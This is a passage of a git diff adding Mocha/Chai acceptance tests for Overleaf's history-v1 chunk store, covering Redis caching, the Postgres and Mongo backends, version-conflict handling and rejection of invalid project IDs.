99) + ).to.be.rejectedWith('bad projectId') + }) + + it('deleteBlobs rejects when called with bad projectId', async function () { + const projectId = new ObjectId().toString() + await expect(postgresBackend.deleteBlobs(projectId)).to.be.rejectedWith( + 'bad projectId' + ) + }) + + it('findBlobs rejects when called with bad projectId', async function () { + const projectId = new ObjectId().toString() + await expect(postgresBackend.findBlobs(projectId)).to.be.rejectedWith( + 'bad projectId' + ) + }) + + it('findBlob rejects when called with bad projectId', async function () { + 
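+ // A Mongo ObjectId string is not a valid Postgres project ID, which must be an integer string (e.g. '123'), so the backend rejects it.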
const projectId = new ObjectId().toString() + await expect( + postgresBackend.findBlob(projectId, 'hash') + ).to.be.rejectedWith('bad projectId') + }) + + it('getProjectBlobs rejects when called with bad projectId', async function () { + const projectId = new ObjectId().toString() + await expect( + postgresBackend.getProjectBlobs(projectId) + ).to.be.rejectedWith('bad projectId') + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/chunk_buffer.test.js b/services/history-v1/test/acceptance/js/storage/chunk_buffer.test.js new file mode 100644 index 0000000..bfd979d --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/chunk_buffer.test.js @@ -0,0 +1,210 @@ +'use strict' + +const { expect } = require('chai') +const sinon = require('sinon') +const { + Chunk, + Snapshot, + History, + File, + AddFileOperation, + Change, +} = require('overleaf-editor-core') +const cleanup = require('./support/cleanup') +const fixtures = require('./support/fixtures') +const chunkBuffer = require('../../../../storage/lib/chunk_buffer') +const chunkStore = require('../../../../storage/lib/chunk_store') +const redisBackend = require('../../../../storage/lib/chunk_store/redis') +const metrics = require('@overleaf/metrics') + +describe('chunk buffer', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + beforeEach(function () { + sinon.spy(metrics, 'inc') + }) + afterEach(function () { + metrics.inc.restore() + }) + + const projectId = '123456' + + describe('loadLatest', function () { + // Initialize project and create a test chunk + beforeEach(async function () { + // Initialize project in chunk store + await chunkStore.initializeProject(projectId) + }) + + describe('with an existing chunk', function () { + beforeEach(async function () { + // Create a sample chunk with some content + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date(), + [] + ), + ] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 1) // startVersion 1 + + // Store the chunk directly in the chunk store using create method + // which internally calls uploadChunk + await chunkStore.create(projectId, chunk) + + // Clear any existing cache + await redisBackend.clearCache(projectId) + }) + + it('should load from chunk store and update cache on first access (cache miss)', async function () { + // First access should load from chunk store and populate cache + const firstResult = await chunkBuffer.loadLatest(projectId) + + // Verify the chunk is correct + expect(firstResult).to.not.be.null + expect(firstResult.getStartVersion()).to.equal(1) + expect(firstResult.getEndVersion()).to.equal(2) + + // Verify that we got a cache miss metric + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-miss', + }) + ).to.be.true + + // Reset the metrics spy + metrics.inc.resetHistory() + + // Second access should hit the cache + const secondResult = await chunkBuffer.loadLatest(projectId) + + // Verify we got the same chunk + expect(secondResult).to.not.be.null + expect(secondResult.getStartVersion()).to.equal(1) + expect(secondResult.getEndVersion()).to.equal(2) + + // Verify that we got a cache hit metric + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-hit', + }) + ).to.be.true + + // Verify both chunks are equivalent + expect(secondResult.getStartVersion()).to.equal( + firstResult.getStartVersion() + ) + 
expect(secondResult.getEndVersion()).to.equal( + firstResult.getEndVersion() + ) + }) + + it('should refresh the cache when chunk changes in the store', async function () { + // First access to load into cache + const firstResult = await chunkBuffer.loadLatest(projectId) + expect(firstResult.getStartVersion()).to.equal(1) + + // Reset metrics spy + metrics.inc.resetHistory() + + // Create a new chunk with different content + const newSnapshot = new Snapshot() + const newChanges = [ + new Change( + [ + new AddFileOperation( + 'updated.tex', + File.fromString('Updated content') + ), + ], + new Date(), + [] + ), + ] + const newHistory = new History(newSnapshot, newChanges) + const newChunk = new Chunk(newHistory, 2) // Different start version + + // Store the new chunk directly in the chunk store + await chunkStore.create(projectId, newChunk) + + // Access again - should detect the change and refresh cache + const secondResult = await chunkBuffer.loadLatest(projectId) + + // Verify we got the updated chunk + expect(secondResult.getStartVersion()).to.equal(2) + expect(secondResult.getEndVersion()).to.equal(3) + + // Verify that we got a cache miss metric (since the cached chunk was invalidated) + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-miss', + }) + ).to.be.true + }) + + it('should continue using cache when chunk in store has not changed', async function () { + // First access to load into cache + await chunkBuffer.loadLatest(projectId) + + // Reset metrics spy + metrics.inc.resetHistory() + + // Access again without changing the underlying chunk + const result = await chunkBuffer.loadLatest(projectId) + + // Verify we got the same chunk + expect(result.getStartVersion()).to.equal(1) + expect(result.getEndVersion()).to.equal(2) + + // Verify that we got a cache hit metric + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-hit', + }) + ).to.be.true + }) + }) + + describe('with an empty project', function () { + it('should handle a case with empty chunks (no changes)', async function () { + // Clear the cache + await redisBackend.clearCache(projectId) + + // Load the initial empty chunk via buffer + const result = await chunkBuffer.loadLatest(projectId) + + // Verify we got the empty chunk + expect(result.getStartVersion()).to.equal(0) + expect(result.getEndVersion()).to.equal(0) // Start equals end for empty chunks + expect(result.history.changes.length).to.equal(0) + + // Verify cache miss metric + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-miss', + }) + ).to.be.true + + // Reset metrics + metrics.inc.resetHistory() + + // Second access should hit the cache + const secondResult = await chunkBuffer.loadLatest(projectId) + + // Verify we got the same empty chunk + expect(secondResult.getStartVersion()).to.equal(0) + expect(secondResult.getEndVersion()).to.equal(0) + expect(secondResult.history.changes.length).to.equal(0) + + // Verify cache hit metric + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-hit', + }) + ).to.be.true + }) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/chunk_store.test.js b/services/history-v1/test/acceptance/js/storage/chunk_store.test.js new file mode 100644 index 0000000..50341fd --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/chunk_store.test.js @@ -0,0 +1,544 @@ +'use strict' + +const cleanup = require('./support/cleanup') +const fixtures = require('./support/fixtures') 
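+// This suite runs the same chunkStore scenarios against both the Postgres backend (integer project IDs) and the Mongo backend (ObjectId strings); see the scenarios array below.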
+const { expect } = require('chai') +const sinon = require('sinon') +const { ObjectId } = require('mongodb') +const { projects } = require('../../../../storage/lib/mongodb') + +const { + Chunk, + Snapshot, + Change, + History, + File, + Operation, + AddFileOperation, + EditFileOperation, + TextOperation, +} = require('overleaf-editor-core') +const { chunkStore, historyStore } = require('../../../../storage') + +describe('chunkStore', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + const scenarios = [ + { + description: 'Postgres backend', + createProject: chunkStore.initializeProject, + idMapping: id => parseInt(id, 10), + }, + { + description: 'Mongo backend', + createProject: () => + chunkStore.initializeProject(new ObjectId().toString()), + idMapping: id => id, + }, + ] + + for (const scenario of scenarios) { + describe(scenario.description, function () { + let projectId + let projectRecord + + beforeEach(async function () { + projectId = await scenario.createProject() + // create a record in the mongo projects collection + projectRecord = await projects.insertOne({ + overleaf: { history: { id: scenario.idMapping(projectId) } }, + }) + }) + + it('loads empty latest chunk for a new project', async function () { + const chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getSnapshot().countFiles()).to.equal(0) + expect(chunk.getChanges().length).to.equal(0) + expect(chunk.getEndTimestamp()).not.to.exist + }) + + describe('creating a chunk', async function () { + const pendingChangeTimestamp = new Date('2014-01-01T00:00:00') + const lastChangeTimestamp = new Date('2015-01-01T00:00:00') + beforeEach(async function () { + const chunk = makeChunk( + [ + makeChange( + Operation.addFile('main.tex', File.fromString('abc')), + lastChangeTimestamp + ), + ], + 1 + ) + await chunkStore.create(projectId, chunk, pendingChangeTimestamp) + }) + it('creates a chunk and inserts the pending change timestamp', async function () { + const project = await projects.findOne({ + _id: new ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.history.currentEndVersion).to.equal(2) + expect(project.overleaf.history.currentEndTimestamp).to.deep.equal( + lastChangeTimestamp + ) + expect(project.overleaf.backup.pendingChangeAt).to.deep.equal( + pendingChangeTimestamp + ) + }) + }) + + describe('adding and editing a blank file', function () { + const testPathname = 'foo.txt' + const testTextOperation = TextOperation.fromJSON({ + textOperation: ['a'], + }) // insert an a + let lastChangeTimestamp + const pendingChangeTimestamp = new Date() + + beforeEach(async function () { + const chunk = await chunkStore.loadLatest(projectId) + const oldEndVersion = chunk.getEndVersion() + const changes = [ + makeChange(Operation.addFile(testPathname, File.fromString(''))), + makeChange(Operation.editFile(testPathname, testTextOperation)), + ] + lastChangeTimestamp = changes[1].getTimestamp() + chunk.pushChanges(changes) + await chunkStore.update( + projectId, + oldEndVersion, + chunk, + pendingChangeTimestamp + ) + }) + + it('records the correct metadata in db readOnly=false', async function () { + const raw = await chunkStore.loadLatestRaw(projectId) + expect(raw).to.deep.include({ + startVersion: 0, + endVersion: 2, + endTimestamp: lastChangeTimestamp, + }) + }) + + it('records the correct metadata in db readOnly=true', async function () { + const raw = await chunkStore.loadLatestRaw(projectId, { + readOnly: true, + }) + expect(raw).to.deep.include({ + startVersion: 0, + 
endVersion: 2,
+ endTimestamp: lastChangeTimestamp,
+ })
+ })
+
+ it('records the correct timestamp', async function () {
+ const chunk = await chunkStore.loadLatest(projectId)
+ expect(chunk.getEndTimestamp()).to.deep.equal(lastChangeTimestamp)
+ })
+
+ it('records changes', async function () {
+ const chunk = await chunkStore.loadLatest(projectId)
+ const history = chunk.getHistory()
+ expect(history.getSnapshot().countFiles()).to.equal(0)
+ expect(history.getChanges().length).to.equal(2)
+ const addChange = history.getChanges()[0]
+ expect(addChange.getOperations().length).to.equal(1)
+ const addFile = addChange.getOperations()[0]
+ expect(addFile).to.be.an.instanceof(AddFileOperation)
+ expect(addFile.getPathname()).to.equal(testPathname)
+ const file = addFile.getFile()
+ expect(file.getHash()).to.equal(File.EMPTY_FILE_HASH)
+ expect(file.getByteLength()).to.equal(0)
+ expect(file.getStringLength()).to.equal(0)
+ const editChange = history.getChanges()[1]
+ expect(editChange.getOperations().length).to.equal(1)
+ const editFile = editChange.getOperations()[0]
+ expect(editFile).to.be.an.instanceof(EditFileOperation)
+ expect(editFile.getPathname()).to.equal(testPathname)
+ })
+
+ it('updates the project record with the current version and timestamps', async function () {
+ const project = await projects.findOne({
+ _id: new ObjectId(projectRecord.insertedId),
+ })
+ expect(project.overleaf.history.currentEndVersion).to.equal(2)
+ expect(project.overleaf.history.currentEndTimestamp).to.deep.equal(
+ lastChangeTimestamp
+ )
+ expect(project.overleaf.backup.pendingChangeAt).to.deep.equal(
+ pendingChangeTimestamp
+ )
+ })
+ })
+
+ describe('multiple chunks', async function () {
+ // Three chunks, created one year apart
+ const pendingChangeTimestamp = new Date('2014-01-01T00:00:00')
+ const firstChunkTimestamp = new Date('2015-01-01T00:00:00')
+ const secondChunkTimestamp = new Date('2016-01-01T00:00:00')
+ const thirdChunkTimestamp = new Date('2017-01-01T00:00:00')
+ let firstChunk, secondChunk, thirdChunk
+
+ beforeEach(async function () {
+ firstChunk = makeChunk(
+ [
+ makeChange(
+ Operation.addFile('foo.tex', File.fromString('')),
+ new Date(firstChunkTimestamp - 5000)
+ ),
+ makeChange(
+ Operation.addFile('bar.tex', File.fromString('')),
+ firstChunkTimestamp
+ ),
+ ],
+ 0
+ )
+ await chunkStore.update(
+ projectId,
+ 0,
+ firstChunk,
+ pendingChangeTimestamp
+ )
+ firstChunk = await chunkStore.loadLatest(projectId)
+
+ secondChunk = makeChunk(
+ [
+ makeChange(
+ Operation.addFile('baz.tex', File.fromString('')),
+ new Date(secondChunkTimestamp - 5000)
+ ),
+ makeChange(
+ Operation.addFile('qux.tex', File.fromString('')),
+ secondChunkTimestamp
+ ),
+ ],
+ 2
+ )
+ await chunkStore.create(projectId, secondChunk)
+ secondChunk = await chunkStore.loadLatest(projectId)
+
+ thirdChunk = makeChunk(
+ [
+ makeChange(
+ Operation.addFile('quux.tex', File.fromString('')),
+ thirdChunkTimestamp
+ ),
+ ],
+ 4
+ )
+ await chunkStore.create(projectId, thirdChunk)
+ thirdChunk = await chunkStore.loadLatest(projectId)
+ })
+
+ it('returns the second chunk when querying for a version between the start and end version', async function () {
+ const chunk = await chunkStore.loadAtVersion(projectId, 3)
+ expect(chunk).to.deep.equal(secondChunk)
+
+ // Check file lazy loading
+ const history = chunk.getHistory()
+ expect(history.getSnapshot().countFiles()).to.equal(0)
+ expect(history.getChanges().length).to.equal(2)
+
+ const change = history.getChanges()[0]
+
expect(change.getOperations().length).to.equal(1) + + const addFile = change.getOperations()[0] + expect(addFile).to.be.an.instanceof(AddFileOperation) + expect(addFile.getPathname()).to.equal('baz.tex') + + const file = addFile.getFile() + expect(file.getHash()).to.equal(File.EMPTY_FILE_HASH) + expect(file.getByteLength()).to.equal(0) + expect(file.getStringLength()).to.equal(0) + }) + + it('returns the first chunk when querying for the end version of the chunk', async function () { + const chunk = await chunkStore.loadAtVersion(projectId, 2) + expect(chunk).to.deep.equal(firstChunk) + }) + + it('returns the second chunk when querying for a timestamp between the second and third chunk', async function () { + const searchTimestamp = new Date('2015-07-01T00:00:00') + const chunk = await chunkStore.loadAtTimestamp( + projectId, + searchTimestamp + ) + expect(chunk).to.deep.equal(secondChunk) + + // Check file lazy loading + const history = chunk.getHistory() + expect(history.getSnapshot().countFiles()).to.equal(0) + expect(history.getChanges().length).to.equal(2) + + const change = history.getChanges()[0] + expect(change.getOperations().length).to.equal(1) + + const addFile = change.getOperations()[0] + expect(addFile).to.be.an.instanceof(AddFileOperation) + expect(addFile.getPathname()).to.equal('baz.tex') + + const file = addFile.getFile() + expect(file.getHash()).to.equal(File.EMPTY_FILE_HASH) + expect(file.getByteLength()).to.equal(0) + expect(file.getStringLength()).to.equal(0) + }) + + it('returns the third chunk when querying for a timestamp past the latest chunk', async function () { + const searchTimestampPastLatestChunk = new Date('2018-01-01T00:00:00') + const chunk = await chunkStore.loadAtTimestamp( + projectId, + searchTimestampPastLatestChunk + ) + // Check that we found the third chunk + expect(chunk).to.deep.equal(thirdChunk) + }) + + it('updates the project record to match the last chunk', async function () { + const project = await projects.findOne({ + _id: new ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.history.currentEndVersion).to.equal(5) + expect(project.overleaf.history.currentEndTimestamp).to.deep.equal( + thirdChunkTimestamp + ) + }) + + it('updates the pending change timestamp to match the first chunk', async function () { + const project = await projects.findOne({ + _id: new ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.backup.pendingChangeAt).to.deep.equal( + pendingChangeTimestamp + ) + }) + + describe('after updating the last chunk', function () { + let newChunk + + beforeEach(async function () { + newChunk = makeChunk( + [ + ...thirdChunk.getChanges(), + makeChange( + Operation.addFile('onemore.tex', File.fromString('')), + thirdChunkTimestamp + ), + ], + 4 + ) + await chunkStore.update(projectId, 5, newChunk) + newChunk = await chunkStore.loadLatest(projectId) + }) + + it('replaces the latest chunk', function () { + expect(newChunk.getChanges()).to.have.length(2) + }) + + it('returns the right chunk when querying by version', async function () { + const chunk = await chunkStore.loadAtVersion(projectId, 5) + expect(chunk).to.deep.equal(newChunk) + }) + + it('returns the right chunk when querying by timestamp', async function () { + const chunk = await chunkStore.loadAtTimestamp( + projectId, + thirdChunkTimestamp + ) + expect(chunk).to.deep.equal(newChunk) + }) + + it('updates the project record to match the latest version and timestamp', async function () { + const project = await projects.findOne({ + _id: new 
ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.history.currentEndVersion).to.equal(6) + expect(project.overleaf.history.currentEndTimestamp).to.deep.equal( + thirdChunkTimestamp + ) + }) + + it('does not modify the existing pending change timestamp in the project record', async function () { + const project = await projects.findOne({ + _id: new ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.backup.pendingChangeAt).to.deep.equal( + pendingChangeTimestamp + ) + }) + }) + + describe('when iterating the chunks with getProjectChunksFromVersion', function () { + // The first chunk has startVersion:0 and endVersion:2 + for (let startVersion = 0; startVersion <= 2; startVersion++) { + it(`returns all chunk records when starting from version ${startVersion}`, async function () { + const chunkRecords = [] + for await (const chunk of chunkStore.getProjectChunksFromVersion( + projectId, + startVersion + )) { + chunkRecords.push(chunk) + } + const expectedChunks = [firstChunk, secondChunk, thirdChunk] + expect(chunkRecords).to.have.length(expectedChunks.length) + chunkRecords.forEach((chunkRecord, index) => { + expect(chunkRecord.startVersion).to.deep.equal( + expectedChunks[index].getStartVersion() + ) + expect(chunkRecord.endVersion).to.deep.equal( + expectedChunks[index].getEndVersion() + ) + }) + }) + } + + // The second chunk has startVersion:2 and endVersion:4 + for (let startVersion = 3; startVersion <= 4; startVersion++) { + it(`returns two chunk records when starting from version ${startVersion}`, async function () { + const chunkRecords = [] + for await (const chunk of chunkStore.getProjectChunksFromVersion( + projectId, + startVersion + )) { + chunkRecords.push(chunk) + } + const expectedChunks = [secondChunk, thirdChunk] + expect(chunkRecords).to.have.length(expectedChunks.length) + chunkRecords.forEach((chunkRecord, index) => { + expect(chunkRecord.startVersion).to.deep.equal( + expectedChunks[index].getStartVersion() + ) + expect(chunkRecord.endVersion).to.deep.equal( + expectedChunks[index].getEndVersion() + ) + }) + }) + } + + // The third chunk has startVersion:4 and endVersion:5 + for (let startVersion = 5; startVersion <= 5; startVersion++) { + it(`returns one chunk record when starting from version ${startVersion}`, async function () { + const chunkRecords = [] + for await (const chunk of chunkStore.getProjectChunksFromVersion( + projectId, + startVersion + )) { + chunkRecords.push(chunk) + } + const expectedChunks = [thirdChunk] + expect(chunkRecords).to.have.length(expectedChunks.length) + chunkRecords.forEach((chunkRecord, index) => { + expect(chunkRecord.startVersion).to.deep.equal( + expectedChunks[index].getStartVersion() + ) + expect(chunkRecord.endVersion).to.deep.equal( + expectedChunks[index].getEndVersion() + ) + }) + }) + } + + it('returns no chunk records when starting from a version after the last chunk', async function () { + const chunkRecords = [] + for await (const chunk of chunkStore.getProjectChunksFromVersion( + projectId, + 6 + )) { + chunkRecords.push(chunk) + } + expect(chunkRecords).to.have.length(0) + }) + }) + }) + + describe('when saving to object storage fails', function () { + beforeEach(function () { + sinon.stub(historyStore, 'storeRaw').rejects(new Error('S3 Error')) + }) + + afterEach(function () { + historyStore.storeRaw.restore() + }) + + it('does not create chunks', async function () { + const oldEndVersion = 0 + const testPathname = 'foo.txt' + const testTextOperation = TextOperation.fromJSON({ + 
textOperation: ['a'], + }) // insert an a + + let chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getEndVersion()).to.equal(oldEndVersion) + + const changes = [ + makeChange(Operation.addFile(testPathname, File.fromString(''))), + makeChange(Operation.editFile(testPathname, testTextOperation)), + ] + chunk.pushChanges(changes) + + await expect( + chunkStore.update(projectId, oldEndVersion, chunk) + ).to.be.rejectedWith('S3 Error') + chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getEndVersion()).to.equal(oldEndVersion) + }) + }) + + describe('version checks', function () { + beforeEach(async function () { + // Create a chunk with start version 0, end version 3 + const chunk = makeChunk( + [ + makeChange(Operation.addFile('main.tex', File.fromString('abc'))), + makeChange( + Operation.editFile( + 'main.tex', + TextOperation.fromJSON({ textOperation: [3, 'def'] }) + ) + ), + makeChange( + Operation.editFile( + 'main.tex', + TextOperation.fromJSON({ textOperation: [6, 'ghi'] }) + ) + ), + ], + 0 + ) + await chunkStore.update(projectId, 0, chunk) + }) + + it('refuses to create a chunk with the same start version', async function () { + const chunk = makeChunk( + [makeChange(Operation.addFile('main.tex', File.fromString('abc')))], + 0 + ) + await expect(chunkStore.create(projectId, chunk)).to.be.rejectedWith( + chunkStore.ChunkVersionConflictError + ) + }) + + it("allows creating chunks that don't have version conflicts", async function () { + const chunk = makeChunk( + [makeChange(Operation.addFile('main.tex', File.fromString('abc')))], + 3 + ) + await chunkStore.create(projectId, chunk) + }) + }) + }) + } +}) + +function makeChange(operation, date = new Date()) { + return new Change([operation], date, []) +} + +function makeChunk(changes, versionNumber) { + const snapshot = Snapshot.fromRaw({ files: {} }) + const history = new History(snapshot, []) + const chunk = new Chunk(history, versionNumber) + + chunk.pushChanges(changes) + return chunk +} diff --git a/services/history-v1/test/acceptance/js/storage/chunk_store_mongo_backend.test.js b/services/history-v1/test/acceptance/js/storage/chunk_store_mongo_backend.test.js new file mode 100644 index 0000000..98cdd2d --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/chunk_store_mongo_backend.test.js @@ -0,0 +1,135 @@ +const { expect } = require('chai') +const { ObjectId } = require('mongodb') +const { + Chunk, + Snapshot, + History, + Change, + AddFileOperation, + File, +} = require('overleaf-editor-core') +const cleanup = require('./support/cleanup') +const backend = require('../../../../storage/lib/chunk_store/mongo') +const { ChunkVersionConflictError } = require('../../../../storage') + +describe('chunk store Mongo backend', function () { + beforeEach(cleanup.everything) + + describe('garbage collection', function () { + it('deletes pending and deleted chunks', async function () { + const projectId = new ObjectId().toString() + + // Create a pending chunk + const pendingChunk = makeChunk([], 0) + const pendingChunkId = await backend.insertPendingChunk( + projectId, + pendingChunk + ) + + // Create a deleted chunk + const deletedChunk = makeChunk([], 0) + const deletedChunkId = await backend.insertPendingChunk( + projectId, + deletedChunk + ) + await backend.confirmCreate(projectId, deletedChunk, deletedChunkId) + await backend.deleteChunk(projectId, deletedChunkId) + + // Check that both chunks are ready to be deleted + let oldChunks = await backend.getOldChunksBatch(100, 0) + 
expect(oldChunks).to.have.deep.members([ + { projectId, chunkId: pendingChunkId }, + { projectId, chunkId: deletedChunkId }, + ]) + + // Delete old chunks + await backend.deleteOldChunks(oldChunks.map(chunk => chunk.chunkId)) + + // Check that there are no more chunks to be deleted + oldChunks = await backend.getOldChunksBatch(100, 0) + expect(oldChunks).to.deep.equal([]) + }) + }) + + describe('concurrency handling', function () { + it('prevents chunks from being created with the same start version', async function () { + const projectId = new ObjectId().toString() + const chunks = [makeChunk([], 10), makeChunk([], 10)] + + const chunkIds = [] + for (const chunk of chunks) { + const chunkId = await backend.insertPendingChunk(projectId, chunk) + chunkIds.push(chunkId) + } + + await backend.confirmCreate(projectId, chunks[0], chunkIds[0]) + await expect( + backend.confirmCreate(projectId, chunks[1], chunkIds[1]) + ).to.be.rejectedWith(ChunkVersionConflictError) + }) + + describe('conflicts between chunk extension and chunk creation', function () { + let projectId, + baseChunkId, + updatedChunkId, + newChunkId, + updatedChunk, + newChunk + + beforeEach(async function () { + projectId = new ObjectId().toString() + const baseChunk = makeChunk([], 0) + baseChunkId = await backend.insertPendingChunk(projectId, baseChunk) + await backend.confirmCreate(projectId, baseChunk, baseChunkId) + + const change = new Change( + [new AddFileOperation('main.tex', File.fromString('hello'))], + new Date() + ) + + updatedChunk = makeChunk([change], 0) + updatedChunkId = await backend.insertPendingChunk( + projectId, + updatedChunk + ) + newChunk = makeChunk([change], 1) + newChunkId = await backend.insertPendingChunk(projectId, newChunk) + }) + + it('prevents creation after extension', async function () { + await backend.confirmUpdate( + projectId, + baseChunkId, + updatedChunk, + updatedChunkId + ) + await expect( + backend.confirmCreate(projectId, newChunk, newChunkId, { + oldChunkId: baseChunkId, + }) + ).to.be.rejectedWith(ChunkVersionConflictError) + }) + + it('prevents extension after creation', async function () { + await backend.confirmCreate(projectId, newChunk, newChunkId, { + oldChunkId: baseChunkId, + }) + await expect( + backend.confirmUpdate( + projectId, + baseChunkId, + updatedChunk, + updatedChunkId + ) + ).to.be.rejectedWith(ChunkVersionConflictError) + }) + }) + }) +}) + +function makeChunk(changes, versionNumber) { + const snapshot = Snapshot.fromRaw({ files: {} }) + const history = new History(snapshot, changes) + const chunk = new Chunk(history, versionNumber) + return chunk +} diff --git a/services/history-v1/test/acceptance/js/storage/chunk_store_postgres_backend.test.js b/services/history-v1/test/acceptance/js/storage/chunk_store_postgres_backend.test.js new file mode 100644 index 0000000..cd1d705 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/chunk_store_postgres_backend.test.js @@ -0,0 +1,110 @@ +const { expect } = require('chai') +const { ObjectId } = require('mongodb') +const { + Chunk, + Snapshot, + History, + Change, + AddFileOperation, + File, +} = require('overleaf-editor-core') +const cleanup = require('./support/cleanup') +const { ChunkVersionConflictError } = require('../../../../storage') +const backend = require('../../../../storage/lib/chunk_store/postgres') + +describe('chunk store Postgres backend', function () { + beforeEach(cleanup.everything) + + it('should reject ObjectId strings as project IDs', async function () { + const invalidProjectId = new 
ObjectId().toString() + + await expect(backend.getLatestChunk(invalidProjectId)).to.be.rejectedWith( + 'bad projectId' + ) + await expect( + backend.getChunkForVersion(invalidProjectId, 1) + ).to.be.rejectedWith('bad projectId') + await expect( + backend.getChunkForTimestamp(invalidProjectId, new Date()) + ).to.be.rejectedWith('bad projectId') + await expect( + backend.getProjectChunkIds(invalidProjectId) + ).to.be.rejectedWith('bad projectId') + await expect( + backend.insertPendingChunk(invalidProjectId, makeChunk([], 0)) + ).to.be.rejectedWith('bad projectId') + await expect( + backend.confirmCreate(invalidProjectId, makeChunk([], 0), 1) + ).to.be.rejectedWith('bad projectId') + await expect( + backend.confirmUpdate(invalidProjectId, 1, makeChunk([], 0), 2) + ).to.be.rejectedWith('bad projectId') + await expect(backend.deleteChunk(invalidProjectId, 1)).to.be.rejectedWith( + 'bad projectId' + ) + await expect( + backend.deleteProjectChunks(invalidProjectId) + ).to.be.rejectedWith('bad projectId') + }) + + describe('conflicts between chunk extension and chunk creation', function () { + let projectId, + baseChunkId, + updatedChunkId, + newChunkId, + updatedChunk, + newChunk + + beforeEach(async function () { + projectId = '1234' + const baseChunk = makeChunk([], 0) + baseChunkId = await backend.insertPendingChunk(projectId, baseChunk) + await backend.confirmCreate(projectId, baseChunk, baseChunkId) + + const change = new Change( + [new AddFileOperation('main.tex', File.fromString('hello'))], + new Date() + ) + + updatedChunk = makeChunk([change], 0) + updatedChunkId = await backend.insertPendingChunk(projectId, updatedChunk) + newChunk = makeChunk([change], 1) + newChunkId = await backend.insertPendingChunk(projectId, newChunk) + }) + + it('prevents creation after extension', async function () { + await backend.confirmUpdate( + projectId, + baseChunkId, + updatedChunk, + updatedChunkId + ) + await expect( + backend.confirmCreate(projectId, newChunk, newChunkId, { + oldChunkId: baseChunkId, + }) + ).to.be.rejectedWith(ChunkVersionConflictError) + }) + + it('prevents extension after creation', async function () { + await backend.confirmCreate(projectId, newChunk, newChunkId, { + oldChunkId: baseChunkId, + }) + await expect( + backend.confirmUpdate( + projectId, + baseChunkId, + updatedChunk, + updatedChunkId + ) + ).to.be.rejectedWith(ChunkVersionConflictError) + }) + }) +}) + +function makeChunk(changes, versionNumber) { + const snapshot = Snapshot.fromRaw({ files: {} }) + const history = new History(snapshot, []) + const chunk = new Chunk(history, versionNumber) + return chunk +} diff --git a/services/history-v1/test/acceptance/js/storage/chunk_store_redis_backend.test.js b/services/history-v1/test/acceptance/js/storage/chunk_store_redis_backend.test.js new file mode 100644 index 0000000..a4ce4f9 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/chunk_store_redis_backend.test.js @@ -0,0 +1,606 @@ +'use strict' + +const { expect } = require('chai') +const { + Chunk, + Snapshot, + History, + File, + AddFileOperation, + Origin, + Change, + V2DocVersions, +} = require('overleaf-editor-core') +const cleanup = require('./support/cleanup') +const redisBackend = require('../../../../storage/lib/chunk_store/redis') + +describe('chunk store Redis backend', function () { + beforeEach(cleanup.everything) + const projectId = '123456' + + describe('getCurrentChunk', function () { + it('should return null on cache miss', async function () { + const chunk = await 
redisBackend.getCurrentChunk(projectId) + expect(chunk).to.be.null + }) + + it('should return the cached chunk', async function () { + // Create a sample chunk + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date(), + [] + ), + ] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 5) // startVersion 5 + + // Cache the chunk + await redisBackend.setCurrentChunk(projectId, chunk) + + // Retrieve the cached chunk + const cachedChunk = await redisBackend.getCurrentChunk(projectId) + + expect(cachedChunk).to.not.be.null + expect(cachedChunk.getStartVersion()).to.equal(5) + expect(cachedChunk.getEndVersion()).to.equal(6) + expect(cachedChunk).to.deep.equal(chunk) + }) + }) + + describe('setCurrentChunk', function () { + it('should successfully cache a chunk', async function () { + // Create a sample chunk + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date(), + [] + ), + ] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 5) // startVersion 5 + + // Cache the chunk + await redisBackend.setCurrentChunk(projectId, chunk) + + // Verify the chunk was cached correctly by retrieving it + const cachedChunk = await redisBackend.getCurrentChunk(projectId) + expect(cachedChunk).to.not.be.null + expect(cachedChunk.getStartVersion()).to.equal(5) + expect(cachedChunk.getEndVersion()).to.equal(6) + expect(cachedChunk).to.deep.equal(chunk) + + // Verify that the chunk was stored correctly using the chunk metadata + const chunkMetadata = + await redisBackend.getCurrentChunkMetadata(projectId) + expect(chunkMetadata).to.not.be.null + expect(chunkMetadata.startVersion).to.equal(5) + expect(chunkMetadata.changesCount).to.equal(1) + }) + + it('should correctly handle a chunk with zero changes', async function () { + // Create a sample chunk with no changes + const snapshot = new Snapshot() + const changes = [] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 10) // startVersion 10 + + // Cache the chunk + await redisBackend.setCurrentChunk(projectId, chunk) + + // Retrieve the cached chunk + const cachedChunk = await redisBackend.getCurrentChunk(projectId) + + expect(cachedChunk).to.not.be.null + expect(cachedChunk.getStartVersion()).to.equal(10) + expect(cachedChunk.getEndVersion()).to.equal(10) // End version should equal start version with no changes + expect(cachedChunk.history.changes.length).to.equal(0) 